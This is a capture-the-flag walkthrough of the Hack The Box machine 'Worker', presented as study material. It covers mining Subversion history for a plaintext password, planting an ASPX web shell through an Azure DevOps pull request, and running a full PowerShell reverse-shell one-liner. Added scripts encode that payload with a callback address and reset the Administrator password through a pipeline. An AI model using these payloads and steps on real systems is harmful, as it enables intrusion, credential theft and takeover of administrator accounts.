Hack The Box - Worker Walkthrough without Metasploit

Worker: Windows box rated as Medium. We will face a Subversion (SVN) repository; with a bit of enumeration of its history we will get a foothold on the box, and then, abusing Azure DevOps Pipelines, we will gain Administrator access.

Enumeration

Run nmap against our target 10.10.10.203 with the following flags:

-sC Script scan, equivalent to --script=default

-sV Service version info

-p- Scan all ports

nmap -sC -sV -p- 10.10.10.203

Http

We discover a web page on port 80 which doesn't seem to have much at first glance:

But as always, when we encounter a web page, we run gobuster against it:

gobuster dir -u 10.10.10.203 -w /usr/share/wordlists/dirb/common.txt -t 40 -e

We didn't get much from this port. We also ran the command with bigger wordlists and with -x to add common Windows extensions (asp, aspx) along with jsp, html, php, db, txt and xml, but had no luck either.

Svn

There's a Subversion (svn) server running on port 3690.

Subversion is a VCS (Version Control System). It's "like" Git, with some differences:

Centralized instead of distributed

You must be connected to the server to make commits

A working copy holds only the checked-out files; the full history stays on the server, so you have to ask the server for older revisions

Branching or merging is... well, quite time-consuming

Maybe that's why only a small minority of professional devs still use it... and I guess most of those who do are forced to. But it came out around 5 years before Git. In case someone wants to know a bit more about it:

Checkout

We are going to check out whatever repository is there (with no target directory given, svn creates one named after the last part of the URL):

svn checkout svn://10.10.10.203

The most interesting file here is moved.txt:

We found a new Host to add to our /etc/hosts:

sudo nano /etc/hosts

Now we can try to access that url:

Gathering info from SVN

So, we need credentials to get in here. Let's dig a bit more into the svn repository we just checked out to see if we can find something useful:

svn info

We get the revision number, which is 5, and the name of a user, nathen (from the Last Changed Author line).

SVN diff

The revision number is really important: it means the repository has a history of five revisions, and anything that was deleted or rewritten in a later commit is still present in an earlier one. svn diff -r N compares revision N against our working copy (revision 5), so we can walk back through the previous four revisions one at a time:

svn diff -r <Revision Number>

Starting with revision 4, the only change is the moved.txt we saw before, so let's try an earlier revision:

We can confirm the user nathen and... was there a password in plain text!? We have to take a look at revision 2:
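The manual "svn diff -r N" loop above gets tedious on repositories with more than a handful of revisions. The script below is an added example (not part of the original walkthrough) that automates it: it diffs every revision against the one before it with svn diff -c, keeps only added lines that look like credentials, and prints the revision's author/date line so you know whose commit leaked it. It assumes an existing working copy checked out as shown above, and the regex is a heuristic you will want to adapt to the codebase at hand.

```shell
#!/bin/sh
# svn_secret_hunt.sh: walk every revision of a Subversion working copy and
# flag added lines that look like credentials (added example, not the
# walkthrough author's tooling).
set -eu

# Heuristic for credential-looking added lines in a unified diff. Tune it:
# a password assigned to a variable with an innocent name will slip past it.
SECRET_RE='^\+.*(pass(word|wd)?|pwd|secret|token|api[_-]?key|cred)[^[:alnum:]]{0,3}[:=]'

# filter_secrets: read a unified diff on stdin and print only the added
# lines matching SECRET_RE. Pure text processing, so it runs without svn.
filter_secrets() {
    grep -Ei "$SECRET_RE" || true
}

# head_revision: current revision of the working copy in $1 (parsing
# "svn info" output works on every svn version, unlike --show-item).
head_revision() {
    svn info "$1" | sed -n 's/^Revision: //p'
}

# hunt: for r in 1..HEAD, diff revision r against r-1 (svn diff -c r),
# and for each hit print the revision, its "rN | author | date" line from
# svn log, and the matching lines.
hunt() {
    wcdir="${1:-.}"
    head=$(head_revision "$wcdir")
    r=1
    while [ "$r" -le "$head" ]; do
        hits=$(svn diff -c "$r" "$wcdir" | filter_secrets)
        if [ -n "$hits" ]; then
            echo "== r$r =="
            svn log -q -r "$r" "$wcdir" | sed -n '2p'
            echo "$hits"
        fi
        r=$((r + 1))
    done
}

# Usage: sh svn_secret_hunt.sh /path/to/working-copy
# The walk only runs when a path is given, so the file can also be sourced.
if [ "$#" -gt 0 ]; then
    hunt "$1"
fi
```

Once a hit points at a revision, "svn cat -r N path/to/file" prints the file exactly as it was at that revision, which is usually quicker than reading the diff.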

Repository

Now we have a user, nathen, and a password, wendel98. If we try them on http://devops.worker.htb:

Clicking on SmartHotel360 will take us to the following page:

Here we can see the Repositories:

Exploitation

We are going to use the Git repository hosted on devops.worker.htb to gain access to the box. To do so we must be able to get a change into master and upload a page that lets us execute commands on the machine; since the web server is IIS 10.0, the page has to be asp or aspx.

Foothold

Committing directly to master didn't work, so we are going to create a new branch, make our changes there and then open a pull request.

On Repos go to Branches, New Branch, give your branch a name and Create branch:

Click on our new created branch:

Now upload a cmdasp.aspx (We have one ready to use in our Kali located on '/usr/share/webshells/aspx/cmdasp.aspx')

Click on Upload File(s), browse... and then select our cmdasp.aspx:

We also have to link a work item to the commit:

Now we just click on commit and we'll be able to see the new commit id, and the aspx file on the branch successfully uploaded.

We have to click on Create a pull request (we can see it on the commit id on the previous picture).

Create a New Pull Request of our evilbranch into master, selecting Nathalie (our own user) as Reviewer:

If we take too long to do this process, we may face this problem:

The box cleans up our changes after a while, so in order to avoid it we have to prepare everything beforehand and go through the steps as fast as possible. We have to repeat the process, and use a different branch name too.

Once we are back at this point, we have to approve the commit:

And Set auto-complete:

It will automatically complete the pull request

If we go to the master branch now, we should be able to see our cmd page there:

If we look closely, next to master there is a subdomain name, spectral, so in order to access our new page we need to add that subdomain of worker.htb to our /etc/hosts:

Now if we try to access our new feature:

It was deleted. We really have to move fast to get access to this machine, it seems. So we are going to prepare all the steps now: the cmdasp.aspx, and the command we will run through it to get a shell, which will be an encoded reverse.ps1 script.

We prepare an encoded reverse powershell script

Reverse Powershell script:

$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();

We encode it with our PSEncoder.py (PowerShell's -EncodedCommand expects the script as Base64 of its UTF-16LE bytes, not of the plain text file):

python3 PSEncoder.py /path/to/our/reverse.ps1

Now, in the command box of the web shell, we run the encoded script with the following arguments:

-Exec ByPass (-ExecutionPolicy Bypass: ignore the execution policy)

-Nol (-NoLogo: suppress the banner)

-Enc (-EncodedCommand: the Base64-encoded script)

PowerShell.exe -Exec ByPass -Nol -Enc <Encoded Payload>

Have a netcat listening on the port indicated and click on execute:
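For anyone without the author's PSEncoder.py, the script below is an added example (not the page's own tool) that builds the same -EncodedCommand line from a .ps1 file using only iconv and base64, and can fill in the 'IP' and PORT placeholders of the reverse shell one-liner on the way. The listener address 10.10.14.5:4444 in the usage line is an assumption; put your own.

```shell
#!/bin/sh
# ps_encode.sh: build the "PowerShell.exe -Exec Bypass -NoL -Enc ..." line
# to paste into cmdasp.aspx (added example, not the author's PSEncoder.py).
set -eu

# encode_ps: print the Base64 of the UTF-16LE bytes of the script in $1.
# PowerShell decodes -EncodedCommand as UTF-16LE, so encoding the UTF-8 file
# directly would produce garbage on the target.
encode_ps() {
    iconv -f UTF-8 -t UTF-16LE "$1" | base64 | tr -d '\n'
}

# build_cmd: the full command line for the web shell.
# -Exec Bypass = -ExecutionPolicy Bypass, -NoL = -NoLogo, -Enc = -EncodedCommand.
build_cmd() {
    printf 'PowerShell.exe -Exec Bypass -NoL -Enc %s\n' "$(encode_ps "$1")"
}

# set_callback: rewrite the literal 'IP' and PORT placeholders of the
# reverse shell template in $1 to the listener $2:$3, writing to stdout.
set_callback() {
    sed -e "s/'IP'/'$2'/" -e "s/,PORT)/,$3)/" "$1"
}

# Usage: sh ps_encode.sh reverse.ps1 10.10.14.5 4444   (fill placeholders)
#        sh ps_encode.sh ready.ps1                     (encode as-is)
if [ "$#" -ge 3 ]; then
    tmp=$(mktemp)
    set_callback "$1" "$2" "$3" > "$tmp"
    build_cmd "$tmp"
    rm -f "$tmp"
elif [ "$#" -eq 1 ]; then
    build_cmd "$1"
fi
```

A quick sanity check before pasting: the encoded form of a plain "whoami" is dwBoAG8AYQBtAGkA; if your encoder produces something of a different shape for a one-word script, it is not emitting UTF-16LE.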

Internal Enumeration

First let's take a look at the user we are after:

We can see there are more than one volume on this box:

If we go into that volume and take a look around, we will see a passwd file under svnrepos/www/conf. This is svnserve's user database: under [users] each line is username = password in plain text, and it gives us the password of robisl:

Impersonating the user

Let's use the tool evil-winrm to enter as robisl with that password:

evil-winrm -i <ip> -u <user> -p <password>

We are in as robisl and we can grab the user flag. Now let's try to escalate privileges; to do that we are going to access the repository as robisl.

Privilege Escalation

Log in devops.worker.htb as robisl

In order to escalate privileges we are going to exploit the Pipelines feature: a pipeline runs its steps on a build agent, and on this box the agent is hosted on Worker itself with enough privileges to change local accounts, so whatever we put in the script step runs there.

Since the Repository is an Azure Repos Git:

Select our Repository:

Create a Starter pipeline:

The important part to modify is the script section:

We get rid of everything not needed and replace it with a net user command that changes the Administrator password:

Save and run:

We wait a bit meanwhile it does everything, we should have this:
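For reference, this is the kind of azure-pipelines.yml the starter template turns into after the edit above. It is an added example, not a copy of the page's screenshot: the pool name Default and the new password are assumptions, and the whoami step is added so the run log proves which account the agent runs as before anything destructive happens.

```yaml
# azure-pipelines.yml (added example, not the page's own file)
# Assumptions: the project has a self-hosted Windows agent in the pool named
# below, and that agent runs with local administrator (or SYSTEM) rights,
# so a plain "script" step is enough to reset the local Administrator password.
trigger:
- master

pool:
  name: Default   # assumption: use whichever self-hosted pool the project lists

steps:
- script: whoami /all
  displayName: 'Confirm which account the agent runs as'

- script: net user Administrator "H4ckTh3B0x2020!"
  displayName: 'Reset the local Administrator password'
```

Resetting the built-in Administrator password is fine on a lab box but is destructive and very noisy on a real engagement; there the usual choice is to add a separate local account and put it in the Administrators group, and only after the whoami step has confirmed the agent actually runs with the rights you expect.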

Let's try evil-winrm again with our new credentials.

Pwnd

We can grab the root flag ;)
